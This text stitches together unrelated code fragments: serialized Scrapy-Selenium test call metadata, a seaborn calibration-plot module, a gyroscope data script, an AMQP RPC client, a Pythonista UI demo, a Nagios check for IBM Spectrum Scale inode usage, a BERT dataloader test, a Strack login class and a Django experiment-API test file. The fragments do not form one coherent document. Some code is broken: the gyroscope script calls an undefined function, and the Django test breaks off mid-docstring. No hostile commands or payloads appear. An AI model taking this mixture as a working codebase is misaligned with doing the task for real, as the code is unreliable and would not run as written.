[((863, 897), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'self.settings'], {}), '(Spider, self.settings)\n', (874, 897), False, 'from scrapy.utils.test import get_crawler\n'), ((973, 1018), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['self.crawler'], {}), '(self.crawler)\n', (1004, 1018), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((1187, 1241), 'scrapy.settings.Settings', 'Settings', (["{'SELENIUM_DRIVER_ARGUMENTS': ['-headless']}"], {}), "({'SELENIUM_DRIVER_ARGUMENTS': ['-headless']})\n", (1195, 1241), False, 'from scrapy.settings import Settings\n'), ((1260, 1289), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'settings'], {}), '(Spider, settings)\n', (1271, 1289), False, 'from scrapy.utils.test import get_crawler\n'), ((1499, 1528), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'settings'], {}), '(Spider, settings)\n', (1510, 1528), False, 'from scrapy.utils.test import get_crawler\n'), ((1771, 1800), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'settings'], {}), '(Spider, settings)\n', (1782, 1800), False, 'from scrapy.utils.test import get_crawler\n'), ((1814, 1854), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (1845, 1854), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((2118, 2152), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'self.settings'], {}), '(Spider, self.settings)\n', (2129, 2152), False, 'from scrapy.utils.test import get_crawler\n'), ((2166, 2206), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (2197, 2206), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((2484, 2518), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'self.settings'], {}), '(Spider, 
self.settings)\n', (2495, 2518), False, 'from scrapy.utils.test import get_crawler\n'), ((2532, 2572), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (2563, 2572), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((3097, 3131), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'self.settings'], {}), '(Spider, self.settings)\n', (3108, 3131), False, 'from scrapy.utils.test import get_crawler\n'), ((3145, 3185), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (3176, 3185), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((3465, 3499), 'scrapy.utils.test.get_crawler', 'get_crawler', (['Spider', 'self.settings'], {}), '(Spider, self.settings)\n', (3476, 3499), False, 'from scrapy.utils.test import get_crawler\n'), ((3513, 3553), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (3544, 3553), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((3886, 3918), 'scrapy.Request', 'Request', ([], {'url': '"""http://not-an-url"""'}), "(url='http://not-an-url')\n", (3893, 3918), False, 'from scrapy import Request, Spider\n'), ((4279, 4323), 'scrapy_selenium.http.SeleniumRequest', 'SeleniumRequest', ([], {'url': '"""http://www.python.org"""'}), "(url='http://www.python.org')\n", (4294, 4323), False, 'from scrapy_selenium.http import SeleniumRequest\n'), ((5049, 5110), 'scrapy_selenium.http.SeleniumRequest', 'SeleniumRequest', ([], {'url': '"""http://www.python.org"""', 'screenshot': '(True)'}), "(url='http://www.python.org', screenshot=True)\n", (5064, 5110), False, 'from scrapy_selenium.http import SeleniumRequest\n'), ((5531, 5626), 'scrapy_selenium.http.SeleniumRequest', 'SeleniumRequest', ([], {'url': '"""http://www.python.org"""', 'script': 
'"""document.title = "scrapy_selenium";"""'}), '(url=\'http://www.python.org\', script=\n \'document.title = "scrapy_selenium";\')\n', (5546, 5626), False, 'from scrapy_selenium.http import SeleniumRequest\n'), ((1378, 1418), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (1409, 1418), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((1628, 1668), 'scrapy_selenium.middlewares.SeleniumMiddleware.from_crawler', 'SeleniumMiddleware.from_crawler', (['crawler'], {}), '(crawler)\n', (1659, 1668), False, 'from scrapy_selenium.middlewares import SeleniumMiddleware\n'), ((2232, 2248), 'shutil.which', 'which', (['"""firefox"""'], {}), "('firefox')\n", (2237, 2248), False, 'from shutil import which\n'), ((3568, 3599), 'unittest.mock.patch.object', 'patch.object', (['mw.driver', '"""quit"""'], {}), "(mw.driver, 'quit')\n", (3580, 3599), False, 'from unittest.mock import patch\n'), ((751, 771), 'shutil.which', 'which', (['"""geckodriver"""'], {}), "('geckodriver')\n", (756, 771), False, 'from shutil import which\n'), ((1730, 1750), 'shutil.which', 'which', (['"""geckodriver"""'], {}), "('geckodriver')\n", (1735, 1750), False, 'from shutil import which\n'), ((2081, 2097), 'shutil.which', 'which', (['"""firefox"""'], {}), "('firefox')\n", (2086, 2097), False, 'from shutil import which\n')]
|
"""Utilities for data visualisation."""
from pathlib import Path
from typing import Optional, Union
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
FIGSIZE = (4, 4)
FONTSIZE = 12
sns.set_theme()
def plot_calibration(
predicted_pi: np.ndarray,
observed_pi: np.ndarray,
fname: Optional[Union[str, Path]] = None,
):
"""Plot miscalibration curve.
Args:
predicted_pi (:obj:`np.ndarray`): The predicted percentile intervals.
observed_pi (:obj:`np.ndarray`): The observed percentile intervals.
fname (str or :obj:`Path`, optional): The file to save the plot.
Defaults to `None`, which shows the plot but does not save it.
"""
plt.figure(figsize=FIGSIZE)
ax_ideal = sns.lineplot([0, 1], [0, 1], label="ideal")
ax_ideal.lines[0].set_linestyle("--")
sns.lineplot(predicted_pi, observed_pi)
plt.fill_between(
predicted_pi,
predicted_pi,
observed_pi,
alpha=0.2,
label="Miscalibration area",
)
ax_ideal.set_xlabel("Expected cumulative distribution")
ax_ideal.set_ylabel("Observed cumulative distribution")
ax_ideal.set_xlim([0, 1])
ax_ideal.set_ylim([0, 1])
if fname:
plt.savefig(fname)
else:
plt.show()
def plot_sharpness(
stdevs: np.ndarray,
sharpness: float,
coeff_var: float,
fname: Optional[Union[str, Path]] = None,
):
"""Plot standard deviation distribution and sharpness.
Args:
stdevs (:obj:`np.ndarray`): An array of the standard deviations.
sharpness (float): The root mean squared of the standard deviations.
coeff_var (float): The coefficient of variation of the standard deviations.
fname (str or :obj:`Path`, optional): The file to save the plot.
Defaults to `None`, which shows the plot but does not save it.
"""
plt.figure(figsize=FIGSIZE)
ax_sharp = sns.distplot(stdevs, kde=False, norm_hist=True)
ax_sharp.set_xlim(left=0.0)
ax_sharp.set_xlabel("Predicted standard deviations (eV)")
ax_sharp.set_ylabel("Normalized frequency")
ax_sharp.set_yticklabels([])
ax_sharp.set_yticks([])
ax_sharp.axvline(x=sharpness, label="sharpness")
xlim = ax_sharp.get_xlim()
if sharpness < (xlim[0] + xlim[1]) / 2:
text = f"\n Sharpness = {sharpness:.2f} eV\n C$_v$ = {coeff_var:.2f}"
h_align = "left"
else:
text = f"\nSharpness = {sharpness:.2f} eV \nC$_v$ = {coeff_var:.2f} "
h_align = "right"
ax_sharp.text(
x=sharpness,
y=ax_sharp.get_ylim()[1],
s=text,
verticalalignment="top",
horizontalalignment=h_align,
fontsize=FONTSIZE,
)
if fname:
plt.savefig(fname)
else:
plt.show()
|
[
"seaborn.lineplot",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.show",
"matplotlib.pyplot.figure",
"seaborn.distplot",
"matplotlib.pyplot.fill_between",
"seaborn.set_theme"
] |
[((207, 222), 'seaborn.set_theme', 'sns.set_theme', ([], {}), '()\n', (220, 222), True, 'import seaborn as sns\n'), ((716, 743), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'FIGSIZE'}), '(figsize=FIGSIZE)\n', (726, 743), True, 'import matplotlib.pyplot as plt\n'), ((759, 802), 'seaborn.lineplot', 'sns.lineplot', (['[0, 1]', '[0, 1]'], {'label': '"""ideal"""'}), "([0, 1], [0, 1], label='ideal')\n", (771, 802), True, 'import seaborn as sns\n'), ((850, 889), 'seaborn.lineplot', 'sns.lineplot', (['predicted_pi', 'observed_pi'], {}), '(predicted_pi, observed_pi)\n', (862, 889), True, 'import seaborn as sns\n'), ((894, 996), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['predicted_pi', 'predicted_pi', 'observed_pi'], {'alpha': '(0.2)', 'label': '"""Miscalibration area"""'}), "(predicted_pi, predicted_pi, observed_pi, alpha=0.2, label=\n 'Miscalibration area')\n", (910, 996), True, 'import matplotlib.pyplot as plt\n'), ((1895, 1922), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'FIGSIZE'}), '(figsize=FIGSIZE)\n', (1905, 1922), True, 'import matplotlib.pyplot as plt\n'), ((1938, 1985), 'seaborn.distplot', 'sns.distplot', (['stdevs'], {'kde': '(False)', 'norm_hist': '(True)'}), '(stdevs, kde=False, norm_hist=True)\n', (1950, 1985), True, 'import seaborn as sns\n'), ((1243, 1261), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {}), '(fname)\n', (1254, 1261), True, 'import matplotlib.pyplot as plt\n'), ((1280, 1290), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1288, 1290), True, 'import matplotlib.pyplot as plt\n'), ((2757, 2775), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {}), '(fname)\n', (2768, 2775), True, 'import matplotlib.pyplot as plt\n'), ((2794, 2804), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2802, 2804), True, 'import matplotlib.pyplot as plt\n')]
|
import os
import re
import math
path = r"D:\Users\<NAME>\Desktop\GyroData\Data";
list = os.listdir(path)
min = 15000;
def findMin(path1,filename1, min):
file1 = open(path1 +"\\"+ filename1, "r")
lines = file1.readlines()
count = 0
for line in lines:
count = count + 1
if(count<min):
min = count
file1.close()
return min
for count, filename in enumerate(os.listdir(path)):
match = re.match(r"([0-9]+)([a-zA-Z]+)", filename, re.I)
items = match.groups()
if items[1]!="Output" and items[1]!="Recording":
min = create_vec(path,filename,min)
|
[
"re.match",
"os.listdir"
] |
[((91, 107), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (101, 107), False, 'import os\n'), ((410, 426), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (420, 426), False, 'import os\n'), ((442, 489), 're.match', 're.match', (['"""([0-9]+)([a-zA-Z]+)"""', 'filename', 're.I'], {}), "('([0-9]+)([a-zA-Z]+)', filename, re.I)\n", (450, 489), False, 'import re\n')]
|
from rich.traceback import install
install()
|
[
"rich.traceback.install"
] |
[((36, 45), 'rich.traceback.install', 'install', ([], {}), '()\n', (43, 45), False, 'from rich.traceback import install\n')]
|
import asyncio
from rpc_server import amqp_url, square
from aioamqp_consumer import RpcClient
async def main():
async with RpcClient(amqp_url) as client:
print(await client.wait(square(x=2)))
coros = [
client.wait(square(x=i))
for i in range(10)
]
print(await asyncio.gather(*coros))
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.close()
|
[
"asyncio.gather",
"aioamqp_consumer.RpcClient",
"asyncio.get_event_loop",
"rpc_server.square"
] |
[((389, 413), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (411, 413), False, 'import asyncio\n'), ((131, 150), 'aioamqp_consumer.RpcClient', 'RpcClient', (['amqp_url'], {}), '(amqp_url)\n', (140, 150), False, 'from aioamqp_consumer import RpcClient\n'), ((251, 262), 'rpc_server.square', 'square', ([], {'x': 'i'}), '(x=i)\n', (257, 262), False, 'from rpc_server import amqp_url, square\n'), ((325, 347), 'asyncio.gather', 'asyncio.gather', (['*coros'], {}), '(*coros)\n', (339, 347), False, 'import asyncio\n'), ((194, 205), 'rpc_server.square', 'square', ([], {'x': '(2)'}), '(x=2)\n', (200, 205), False, 'from rpc_server import amqp_url, square\n')]
|
# coding: utf-8
# See: https://forum.omz-software.com/topic/2374/is-there-a-way-to-programmatically-highlight-a-ui-segmentedcontrol
import ui
class SegNav(ui.View):
def __init__(self):
self.present()
self.name = 'SegNav'
seg = ui.SegmentedControl()
seg.action = self.seg_view_action
seg.background_color = 'white'
seg.flex = 'W'
seg.height = 40
seg.segments = 'even', 'odd'
seg.selected_index = 0 # set the highlight
seg.width = self.bounds.w
self.add_subview(seg)
x, y, w, h = self.bounds
self.table_view = ui.TableView()
self.table_view.data_source = ui.ListDataSource(range(0, 42, 2))
self.table_view.flex = 'WH'
self.table_view.frame = x, y + seg.height, w, h - seg.height
self.add_subview(self.table_view)
def seg_view_action(self, sender):
# print(sender.segments[sender.selected_index])
self.table_view.data_source.items = range(sender.selected_index, 42, 2)
SegNav()
|
[
"ui.SegmentedControl",
"ui.TableView"
] |
[((258, 279), 'ui.SegmentedControl', 'ui.SegmentedControl', ([], {}), '()\n', (277, 279), False, 'import ui\n'), ((621, 635), 'ui.TableView', 'ui.TableView', ([], {}), '()\n', (633, 635), False, 'import ui\n')]
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import TestCase
from datetime import datetime
from datetime import timedelta
from dino import environ
from dino.config import ConfigKeys
from dino.rest.resources.banned import BannedResource
__author__ = '<NAME> <<EMAIL>>'
from dino.rest.resources.rooms import RoomsResource
class FakeDb(object):
def set_all_rooms(self):
pass
def get_all_rooms(self):
return [
{
'id': '1',
'status': 'private',
'name': 'foo',
'channel': 'foo channel'
},
{
'id': '2',
'status': 'public',
'name': 'bar',
'channel': 'bar channel'
},
]
class RoomsTest(TestCase):
def setUp(self):
environ.env.db = FakeDb()
self.resource = RoomsResource()
def test_get(self):
self.assertEqual(2, len(self.resource.do_get()))
def test_set_last_cleared(self):
last_cleared = self.resource._get_last_cleared()
self.resource._set_last_cleared(datetime.utcnow()+timedelta(minutes=5))
self.assertNotEqual(last_cleared, self.resource._get_last_cleared())
|
[
"datetime.datetime.utcnow",
"dino.rest.resources.rooms.RoomsResource",
"datetime.timedelta"
] |
[((1416, 1431), 'dino.rest.resources.rooms.RoomsResource', 'RoomsResource', ([], {}), '()\n', (1429, 1431), False, 'from dino.rest.resources.rooms import RoomsResource\n'), ((1649, 1666), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (1664, 1666), False, 'from datetime import datetime\n'), ((1667, 1687), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (1676, 1687), False, 'from datetime import timedelta\n')]
|
#!/usr/bin/python
################################################################################
# Name: Check IBM Spectrum Scale / GPFS inode stats
# Dependencies: - IBM Spectrum Scale
################################################################################
import os
import subprocess
import sys
import re
import string
import argparse
################################################################################
# # Variable definition for Nagios
################################################################################
STATE_OK = 0
STATE_WARNING = 1
STATE_CRITICAL = 2
STATE_UNKNOWN = 3
def checkRequirments():
"""
Check if following tools are installed on the system: IBM Spectrum Scale
"""
if not (os.path.isdir("/usr/lpp/mmfs/bin/") and os.path.isfile("/usr/lpp/mmfs/bin/mmgetstate") ):
print(str(STATE_CRITICAL) + "CRITICAL - No IBM Spectrum Scale Installation detected." )
def checkStatusDevice(args):
outputS=""
criticalFlag=0
if args.fset:
fdout = executeBashCommand("sudo /usr/lpp/mmfs/bin/mmlsfileset " + args.device + " root,"+args.fset +" -iY")
else:
fdout = executeBashCommand("sudo /usr/lpp/mmfs/bin/mmlsfileset " + args.device + " -iY")
'''
position 32 - MaxInodes
position 33 - AllocInodes
position 14 - Used
position 7 - FileSet name
'''
for line in fdout.splitlines():
if 'mmlsfileset' in line:
if line.split(':')[7] in {'root'}:
MaxInodesRoot = line.split(':')[33]
for line in fdout.splitlines():
if 'mmlsfileset' in line:
if line.split(':')[7] not in {'root','filesetName'}:
FileSet= line.split(':')[7]
UsedInodes = float (line.split(':')[14])
UsedInodesStr = line.split(':')[14]
MaxInodes = float (line.split(':')[33])
MaxInodesStr = line.split(':')[33]
if int(MaxInodesStr) == 0 :
MaxInodesStr = MaxInodesRoot
MaxInodes = float(MaxInodesRoot)
if 100 * UsedInodes/ MaxInodes > float(args.critical):
print ("CRITICAL - " + line.split(':')[7] )
criticalFlag=2
elif 100 * UsedInodes/ MaxInodes > float(args.warning):
print ("WARNING - " + line.split(':')[7] )
if criticalFlag != 2:
criticalFlag=1
if args.percent:
outputS = outputS + " " + FileSet + "=" + '{:.2f}'.format(100* UsedInodes/ MaxInodes) + "%;" + str(args.warning) + ";" + str(args.critical) + ";0;100; "
elif args.number:
outputS = outputS + " " + FileSet +"_Used=" + UsedInodesStr + ";" + '{:.0f}'.format(float(args.warning) * MaxInodes / 100) +";"+ '{:.0f}'.format(float(args.critical) * MaxInodes / 100)+ ";0;" + MaxInodesStr + "; "
else:
outputS = outputS + " " + FileSet + "=" + '{:.2f}'.format(100* UsedInodes/ MaxInodes) + "%;" + str(args.warning) + ";" + str(args.critical) + ";0;100; " + FileSet +"_Used=" + UsedInodesStr + ";" + '{:.0f}'.format(float(args.warning) * MaxInodes / 100) +";"+ '{:.0f}'.format(float(args.critical) * MaxInodes / 100)+ ";0;" + MaxInodesStr + "; "
print (args.device + "|" + outputS )
sys.exit(criticalFlag)
def executeBashCommand(command):
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
return process.communicate()[0]
def argumentParser():
parser = argparse.ArgumentParser(description='Check inode fileset status')
group = parser.add_argument_group();
subParser = parser.add_subparsers()
nodeParser = subParser.add_parser('device', help='Check inode status for FileSets per Device')
nodeParser.set_defaults(func=checkStatusDevice)
nodeParser.add_argument('-d', '--device', dest='device', action='store', help='Device to get inode stats', required=True)
nodeParser.add_argument('-f', '--fset', dest='fset', action='store', help='Fileset, comma separated, to get inode stats')
nodeParser.add_argument('-w', '--warning', dest='warning', action='store', help='Warning level of inodes utilization, in percent', default=90)
nodeParser.add_argument('-c', '--critical', dest='critical', action='store', help='Critical level of inodes utilization, in percent', default=96)
nodeParser.add_argument('-p', '--percent', dest='percent', action='store_true', help='Show output in percents')
nodeParser.add_argument('-n', '--number', dest='number', action='store_true', help='Show output in numbers')
return parser
if __name__ == '__main__':
checkRequirments()
#checkStatus()
parser = argumentParser()
args = parser.parse_args()
args.func(args)
|
[
"os.path.isdir",
"os.path.isfile",
"argparse.ArgumentParser",
"sys.exit"
] |
[((3453, 3475), 'sys.exit', 'sys.exit', (['criticalFlag'], {}), '(criticalFlag)\n', (3461, 3475), False, 'import sys\n'), ((3667, 3732), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Check inode fileset status"""'}), "(description='Check inode fileset status')\n", (3690, 3732), False, 'import argparse\n'), ((779, 814), 'os.path.isdir', 'os.path.isdir', (['"""/usr/lpp/mmfs/bin/"""'], {}), "('/usr/lpp/mmfs/bin/')\n", (792, 814), False, 'import os\n'), ((819, 865), 'os.path.isfile', 'os.path.isfile', (['"""/usr/lpp/mmfs/bin/mmgetstate"""'], {}), "('/usr/lpp/mmfs/bin/mmgetstate')\n", (833, 865), False, 'import os\n')]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Time: 2021-11-22 11:43 上午
Author: huayang
Subject:
"""
import os # noqa
import doctest # noqa
# from typing import *
# from itertools import islice
# from collections import defaultdict
# from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
from huaytools.pytorch.data import MultiBertSample, BertDataLoader
def _test_single():
""""""
from sentence_transformers import InputExample, SentenceTransformer
from huaytools.pytorch.nn import get_CKPT_DIR
pt_ckpt_path = os.path.join(get_CKPT_DIR(), 'bert-base-chinese')
st = SentenceTransformer(pt_ckpt_path)
file = ['我爱python', '我爱机器学习', '我爱nlp'] * 3 # 9
# SentenceTransformer
ds_st = [InputExample(texts=[row], label=1) for row in file]
dl_st = DataLoader(ds_st, batch_size=4, collate_fn=st.smart_batching_collate) # noqa
ds_my = [MultiBertSample(texts=[row], label=1) for row in file]
dl_my = BertDataLoader(ds_my, batch_size=4)
for b_st, b_my in zip(dl_st, dl_my):
assert torch.equal(b_st[0][0]['input_ids'], b_my[0][0]['token_ids'])
def _test():
""""""
doctest.testmod()
_test_single()
if __name__ == '__main__':
""""""
_test()
|
[
"huaytools.pytorch.nn.get_CKPT_DIR",
"torch.utils.data.DataLoader",
"sentence_transformers.InputExample",
"torch.equal",
"huaytools.pytorch.data.BertDataLoader",
"huaytools.pytorch.data.MultiBertSample",
"sentence_transformers.SentenceTransformer",
"doctest.testmod"
] |
[((621, 654), 'sentence_transformers.SentenceTransformer', 'SentenceTransformer', (['pt_ckpt_path'], {}), '(pt_ckpt_path)\n', (640, 654), False, 'from sentence_transformers import InputExample, SentenceTransformer\n'), ((811, 880), 'torch.utils.data.DataLoader', 'DataLoader', (['ds_st'], {'batch_size': '(4)', 'collate_fn': 'st.smart_batching_collate'}), '(ds_st, batch_size=4, collate_fn=st.smart_batching_collate)\n', (821, 880), False, 'from torch.utils.data import DataLoader\n'), ((970, 1005), 'huaytools.pytorch.data.BertDataLoader', 'BertDataLoader', (['ds_my'], {'batch_size': '(4)'}), '(ds_my, batch_size=4)\n', (984, 1005), False, 'from huaytools.pytorch.data import MultiBertSample, BertDataLoader\n'), ((1155, 1172), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (1170, 1172), False, 'import doctest\n'), ((575, 589), 'huaytools.pytorch.nn.get_CKPT_DIR', 'get_CKPT_DIR', ([], {}), '()\n', (587, 589), False, 'from huaytools.pytorch.nn import get_CKPT_DIR\n'), ((747, 781), 'sentence_transformers.InputExample', 'InputExample', ([], {'texts': '[row]', 'label': '(1)'}), '(texts=[row], label=1)\n', (759, 781), False, 'from sentence_transformers import InputExample, SentenceTransformer\n'), ((903, 940), 'huaytools.pytorch.data.MultiBertSample', 'MultiBertSample', ([], {'texts': '[row]', 'label': '(1)'}), '(texts=[row], label=1)\n', (918, 940), False, 'from huaytools.pytorch.data import MultiBertSample, BertDataLoader\n'), ((1063, 1124), 'torch.equal', 'torch.equal', (["b_st[0][0]['input_ids']", "b_my[0][0]['token_ids']"], {}), "(b_st[0][0]['input_ids'], b_my[0][0]['token_ids'])\n", (1074, 1124), False, 'import torch\n')]
|
# :coding: utf-8
# :copyright: Copyright (c) 2021 strack
import traceback
from strack_connect.config.log import *
from strack_api.strack import Strack
from dayu_widgets.qt import QThread, Signal
from dayu_widgets.alert import MAlert
import threading
class LoginThread(QThread):
"""Session api by thread"""
# Login Msg signal.
loginMsg = Signal(object, object)
loginSuccessSignal = Signal()
url = ""
username = ""
password = ""
def start(self, url, username, password):
"""Start thread."""
self.url = url
self.username = username
self.password = password
super(LoginThread, self).start()
def _handle_login(self):
"""Login to server with *api_user* and *api_key*."""
session = Session()
res = session.get_token(self.url, self.username, self.password)
if not res['code']:
self.loginMsg.emit(res['msg'], MAlert.ErrorType)
else:
self.loginMsg.emit(res['msg'], MAlert.SuccessType)
self.loginSuccessSignal.emit()
def run(self):
"""Listen for events."""
self._handle_login()
class Session(object):
_instance_lock = threading.Lock()
def __init__(self):
pass
def __new__(cls, *args, **kwargs):
if not hasattr(Session, "_instance"):
with Session._instance_lock:
if not hasattr(Session, "_instance"):
Session._instance = object.__new__(cls)
return Session._instance
@staticmethod
def get_token(url, username, password):
logger = get_logger("api")
try:
strack = Strack(url, username, password)
user_filters = [['id', 'is', strack.user_id]]
user = strack.find('user', user_filters)
print(user)
if not user:
raise RuntimeError('Cannot find user named %s.' % username)
return {
'code': True,
'msg': u"登录成功,正在跳转……"
}
except Exception as err:
logger.error("login failed. Please check login info.")
logger.error(err)
logger.error(traceback.format_exc())
return {
'code': False,
'msg': u"登录失败. %s." % err.args
}
|
[
"threading.Lock",
"strack_api.strack.Strack",
"dayu_widgets.qt.Signal",
"traceback.format_exc"
] |
[((352, 374), 'dayu_widgets.qt.Signal', 'Signal', (['object', 'object'], {}), '(object, object)\n', (358, 374), False, 'from dayu_widgets.qt import QThread, Signal\n'), ((400, 408), 'dayu_widgets.qt.Signal', 'Signal', ([], {}), '()\n', (406, 408), False, 'from dayu_widgets.qt import QThread, Signal\n'), ((1192, 1208), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (1206, 1208), False, 'import threading\n'), ((1653, 1684), 'strack_api.strack.Strack', 'Strack', (['url', 'username', 'password'], {}), '(url, username, password)\n', (1659, 1684), False, 'from strack_api.strack import Strack\n'), ((2179, 2201), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (2199, 2201), False, 'import traceback\n')]
|
'''
This is the test file.
'''
from django.test import TestCase, SimpleTestCase
from django.test import Client
from django.test import tag
from django.urls import reverse
import os
import subprocess
import signal
import multiprocessing
import time
import requests
import argparse
# -------Some Configurations-------
# Paths to test file
TSV_ZIP_PATH = 'test_files/test_opt.zip'
MODEL_DIR = 'test_files/model/'
TSV_DIR = 'test_files/tsv/'
HTML_DIR = 'test_files/output/html/'
# After each testcase, output http response status if set'True'
OUTPUT_STATUS = True
# After each testcase, output http response json data if set'True'
OUTPUT_JSON = True
# After each experiment, save html of figure into loacl file if set'True'
OUTPUT_HTML = True
# Global variable for naming html file
TIME_STAMP = ''
# Test API for experiment
class TestExperiment(TestCase):
# Open output html file:
@classmethod
def setUpClass(cls):
global TIME_STAMP
TIME_STAMP = time.strftime("%Y_%m_%d_%H:%M:%S", time.localtime())
@classmethod
def tearDownClass(cls):
print('-------Testing experiments finished-------')
# Output necessary info;
# Check if there is errors.
def handle_response(self,response):
self.assertEqual('', response.json()['error'])
# Output some info
if OUTPUT_STATUS:
print('Status: '+str(response.status_code))
if OUTPUT_JSON:
print(response.json())
if OUTPUT_HTML:
self.html_file.write(response.json()['figure'])
# According to tsv_path and model_path,
# send REST request django.test.Client
def send_request(self, tsv_path, model_path):
# 1.Set data
contents = {
"username": "unittest",
'tsv_file': open(tsv_path, 'rb'),
'model_file': open(model_path, 'rb')
}
# 2. Send REST request, get response
response = self.test_client.post(self.test_url, contents)
return response
# 1.Build django.test.Client for sending REST requests.
# 2.Get utl using django.urls.reverse().
# 3.Open html file for writing figures.
def setUp(self):
# build client
self.test_client = Client()
# set url
self.test_url = reverse('experiment-list')
# Open file
html_path = TIME_STAMP + '.html'
html_path = os.path.join(HTML_DIR, html_path)
self.html_file = open(html_path,"a")
# Close html file.
def tearDown(self):
self.html_file.close()
@tag('BC','experiment')
def test_experiment_BC(self):
""" Test experiment. Type: BarChart """
# bc_ratio_sb8.tsv
tsv = os.path.join(TSV_DIR, 'bc_ratio_sb8.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
@tag('DP','experiment')
def test_experiment_DP(self):
""" Test experiment. Type: DirectParameter """
# dp_Kd_tau.tsv
tsv = os.path.join(TSV_DIR, 'dp_Kd_tau.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
# dp.tsv
tsv = os.path.join(TSV_DIR, 'dp.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
@tag('DR','experiment')
def test_experiment_DR(self):
""" Test experiment. Type: DoseResponse """
# dr_ratio_b2c.tsv
tsv = os.path.join(TSV_DIR, 'dr_ratio_b2c.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
# dr_j2c.tsv
tsv = os.path.join(TSV_DIR, 'dr_j2c.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
@tag('TS','experiment')
def test_experiment_TS(self):
""" Test experiment. Type: TimeSeries """
# iclamp_hh13.tsv
tsv = os.path.join(TSV_DIR, 'iclamp_hh13.tsv')
model = os.path.join(MODEL_DIR, 'loadhh.py')
r = self.send_request(tsv,model)
self.handle_response(r)
# vclamp_hh.tsv
tsv = os.path.join(TSV_DIR, 'vclamp_hh.tsv')
model = os.path.join(MODEL_DIR, 'loadhh.py')
r = self.send_request(tsv,model)
self.handle_response(r)
# ts_j4d.tsv
tsv = os.path.join(TSV_DIR, 'ts_j4d.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
# ts_norm_m3b.tsv
tsv = os.path.join(TSV_DIR, 'ts_norm_m3b.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
# ts_ratio_t2a.tsv
tsv = os.path.join(TSV_DIR, 'ts_ratio_t2a.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
'''
Testing files are following:
BarChart:
bc_ratio_sb8.tsv synSynth7.g
DirectParameter:
dp_Kd_tau.tsv synSynth7.g
dp.tsv synSynth7.g
DoseResponse:
dr_j2c.tsv synSynth7.g
dr_ratio_b2c.tsv synSynth7.g
TimeSeries:
iclamp_hh13.tsv loadhh.py
